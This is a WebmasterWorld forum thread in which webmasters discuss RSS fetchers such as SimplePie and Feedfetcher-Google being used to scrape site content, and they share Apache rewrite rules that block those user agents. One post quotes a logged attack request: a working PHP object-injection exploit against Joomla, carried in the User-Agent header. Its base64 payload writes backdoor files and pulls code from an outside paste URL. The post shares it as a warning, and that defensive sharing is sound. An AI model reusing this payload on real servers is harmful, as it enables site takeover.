Forum Moderators: open

Message Too Old, No Replies

SimplePie, Feedfetcher & other RSS fetchers

         

keyplyr

11:13 pm on Jul 15, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



SimplePie is an RSS & Atom fetcher/reader/parser useful to many users.
An easy to use API that handles all of the dirty work when it comes to fetching, caching, parsing, normalizing data structures between formats, handling character encoding translation, and sanitizing the resulting data


FeedFetcher-Google is an RSS & Atom fetcher/reader/parser useful to many users.
When users add a service or app that uses Feedfetcher data, Google's Feedfetcher attempts to obtain the content of the feed in order to display it.


However, if you are not offering an RSS or Atom feed, these tools (and others) may be (mis)used to display your site content on remote sites, blogs, webcasts, etc with little evidence.

If you do not offer feeds & you wish to insure your content is not used in this manner, simply block the UAs:
RewriteCond %{HTTP_USER_AGENT} (Feedfetcher|SimplePie) 
RewriteRule - [F]


This is what Google recommends:
Google can't restrict users from accessing it (your content.) One solution is to configure your site to serve a 404, 410, or other error status message to user-agent Feedfetcher-Google.

tangor

11:24 pm on Jul 15, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



? Sounds like a method to crawl and by pass other restrictions. :)

I don't RSS so apparently I have much to learn if this is something to watch out for.

keyplyr

11:40 pm on Jul 15, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I've always blocked Feedfetcher-Google (with no adverse effects) but recently learned a SimplePie user was grabbing my content for a use I do not allow. This is not the fault of SimplePie, only an exploit of the user.

Notice the target was the index page (and its content) and not RSS or Atom:
"GET / HTTP/1.1" 418 589 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:1182:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2xvbGEucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21WamFHOGdJbTFoWjI1dmJTQmhkWFJ2SUdOeVpXRjBJR1pwYkdWeklqc05DZzBLWm5WdVkzUnBiMjRnYUhSMGNGOW5aWFFvSkhWeWJDbDdEUW9KSkdsdElEMGdZM1Z5YkY5cGJtbDBLQ1IxY213cE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOVNSVlJWVWs1VVVrRk9VMFpGVWl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYME5QVGs1RlExUlVTVTFGVDFWVUxDQXhNQ2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBaUFRFeFBWMHhQUTBGVVNVOU9MQ0F4S1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlNFVkJSRVZTTENBd0tUc05DZ2x5WlhSMWNtNGdZM1Z5YkY5bGVHVmpLQ1JwYlNrN0RRb0pZM1Z5YkY5amJHOXpaU2drYVcwcE93MEtmUTBLSkdOb1pXTnJOVDBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmJHVm5ZV041TDJ4dlp5OXFjeTV3YUhBaUlEc05DaVIwWlhoME5TQTlJR2gwZEhCZloyVjBLQ2RvZEhSd2N6b3ZMMmRvYjNOMFltbHVMbU52YlM5d1lYTjBaUzloZHpWallTOXlZWGNuS1RzTkNpUnZjRFU5Wm05d1pXNG9KR05vWldOck5Td2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTFMQ1IwWlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRcEFkVzVzYVc1cktGOWZSa2xNUlY5ZktUc05DajgrJykpOw0KZmNsb3NlKCRmcCk7'));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"

The user was from T-Mobile Czech Republic ADSL. In the above case, my host config blocked the request.

keyplyr

12:06 am on Jul 16, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



There are many other RSS fetcher tools. It may be wise to add a generic UA attribute to that block list:
RewriteCond %{HTTP_USER_AGENT} (Feedfetcher|rss|SimplePie) [NC]
RewriteRule - [F]

[edited by: keyplyr at 1:44 am (utc) on Jul 16, 2016]

tangor

12:34 am on Jul 16, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Made me look more closely at the recent logs. Thanks for the heads up!

wilderness

4:15 am on Jul 16, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



FWIW, fetch on its own should be included in a rather small group (perhaps a dozen or two) of names contained in UA's that have been commonly used for abuse, and for nearly two decades.

keyplyr

11:41 pm on Jul 16, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Another one:

FeedChecker-Zocle/1.0 (+https://zocle.com/zoclechecker)

keyplyr

9:56 pm on Jul 31, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Another one:

RSSingBot (http://www.rssing.com)

blend27

8:04 am on Aug 3, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



FWIW, fetch on its own should be included

So is anything that is looking for "feed" or "atom" in its path.

I recently overtook a project where a local moving company(rural US) was getting couple dozen requests a day from NL, GB & FR server farms looking for those paths.

Amazing! Target practice!

keyplyr

8:13 am on Aug 3, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I have at least one beneficial bot that includes "fetch" in its UA.

keyplyr

9:02 pm on Sep 17, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Another one: zelist.ro feed parser (+http://www.zelist.ro)